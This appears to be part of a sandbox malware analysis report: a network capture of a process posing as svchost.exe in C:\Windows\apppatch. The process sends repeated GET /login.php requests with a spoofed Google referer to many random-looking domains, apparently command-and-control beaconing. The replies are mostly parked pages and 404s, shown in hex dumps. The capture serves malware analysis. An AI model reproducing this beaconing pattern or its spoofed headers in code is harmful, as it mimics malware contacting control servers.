                                                                                                                                                                                                            Data Ascii: 858<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_0FAmRW/Ag0BMutawvMN5/7T4vliKs+oYUVMd+Y55OnVzCkefKmzxOe8RFFzyuxXN6lNGB+yXV2H6NbLg+OVM3w==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115292072 CET1236INData Raw: 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d
                                                                                                                                                                                                            Data Ascii: t source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115305901 CET1236INData Raw: 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f
                                                                                                                                                                                                            Data Ascii: ine-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}butt
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115324020 CET1236INData Raw: 74 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70
                                                                                                                                                                                                            Data Ascii: tton;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.anno
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115335941 CET1236INData Raw: 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72
                                                                                                                                                                                                            Data Ascii: -size:10px}.container-disclaimer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__conte
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115348101 CET1236INData Raw: 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d
                                                                                                                                                                                                            Data Ascii: rgin-top:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transitio
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115354061 CET1236INData Raw: 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 2d 73
                                                                                                                                                                                                            Data Ascii: nd-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115360975 CET1236INData Raw: 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32 65 3b 66 6f 6e 74 2d
                                                                                                                                                                                                            Data Ascii: rm:translateX(26px);transform:translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:5%;pad
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115366936 CET1236INData Raw: 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 74 72 61 6e 73 66 6f 72 6d
                                                                                                                                                                                                            Data Ascii: ransform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.container-content--twot{min-height:72
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.115372896 CET560INData Raw: 6e 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 66 64 38 30
                                                                                                                                                                                                            Data Ascii: ne}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#9fd801;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.120240927 CET1236INData Raw: 7b 6d 61 72 67 69 6e 3a 30 7d 2e 64 6f 6d 61 69 6e 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 32 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 74 65 78 74 2d
                                                                                                                                                                                                            Data Ascii: {margin:0}.domain h1{font-size:2.2em;font-weight:normal;text-decoration:none;text-transform:lowercase;color:#949494}#container-domain{display:block;text-align:center} </style><script type="text/javascript"> var dto = {"uiOptimize"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            27192.168.2.956977199.59.243.227807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.449634075 CET350OUTGET /login.php?subid1=20241112-0407-4879-ab0a-fce34aca034a HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: ww25.lyxynyx.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: __tad=1731344868.1489616
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.896653891 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:07:49 GMT
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            content-length: 1230
                                                                                                                                                                                                            x-request-id: 07951af7-1a60-440f-a856-c66b7de487f9
                                                                                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ICuiegth149RI3KeTCRDtEIIj5zNo9NP2olBsh90l2b86EAQ0Y3d8D3vXFbKUwCoXwuA64pUaBezTAZwkH+7WQ==
                                                                                                                                                                                                            set-cookie: parking_session=07951af7-1a60-440f-a856-c66b7de487f9; expires=Mon, 11 Nov 2024 17:22:49 GMT; path=/
                                                                                                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 49 43 75 69 65 67 74 68 31 34 39 52 49 33 4b 65 54 43 52 44 74 45 49 49 6a 35 7a 4e 6f 39 4e 50 32 6f 6c 42 73 68 39 30 6c 32 62 38 36 45 41 51 30 59 33 64 38 44 33 76 58 46 62 4b 55 77 43 6f 58 77 75 41 36 34 70 55 61 42 65 7a 54 41 5a 77 6b 48 2b 37 57 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ICuiegth149RI3KeTCRDtEIIj5zNo9NP2olBsh90l2b86EAQ0Y3d8D3vXFbKUwCoXwuA64pUaBezTAZwkH+7WQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                            Nov 11, 2024 18:07:49.896775961 CET664INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                            Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDc5NTFhZjctMWE2MC00NDBmLWE4NTYtYzY2YjdkZTQ4N2Y5IiwicGFnZV90aW1lIjoxNzMxMzQ0ODY5LCJwYWdlX3VybCI6I


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            28192.168.2.94926964.225.91.73807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:50.775305986 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qetyhyg.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.324832916 CET816INHTTP/1.1 200 OK
                                                                                                                                                                                                            server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:07:51 GMT
                                                                                                                                                                                                            content-type: text/html
                                                                                                                                                                                                            content-length: 593
                                                                                                                                                                                                            last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                            etag: "63f68860-251"
                                                                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            29192.168.2.94927672.52.179.174807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:51.127825975 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyhub.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            30192.168.2.94927772.52.179.174807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:52.094928980 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyhub.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            31192.168.2.95597352.34.198.229807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:54.230922937 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lygyvuj.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:54.944458961 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:54 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=86413af6990054635c36eeef22b5e6c6|66.23.206.109|1731344874|1731344874|0|1|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            32192.168.2.95429244.221.84.105807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:57.856105089 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyhiz.com
                                                                                                                                                                                                            Nov 11, 2024 18:07:58.285528898 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:58 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=f6a8643411fffdab52c2830f5397f637|66.23.206.109|1731344878|1731344878|0|1|0; path=/; domain=.gahyhiz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Set-Cookie: snkz=66.23.206.109; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            33192.168.2.95495385.17.31.82807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.729769945 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            34192.168.2.95495423.253.46.64807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.853358030 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.308461905 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:54 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.308474064 CET169INData Raw: 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            35192.168.2.954955199.59.243.227807444C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:07:59.896739960 CET305OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com
                                                                                                                                                                                                            Cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
                                                                                                                                                                                                            Nov 11, 2024 18:08:00.322632074 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:07:59 GMT
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            content-length: 1094
                                                                                                                                                                                                            x-request-id: 94950624-c991-4fb7-afb0-803d51a37085
                                                                                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                            set-cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65; expires=Mon, 11 Nov 2024 17:23:00 GMT
                                                                                                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
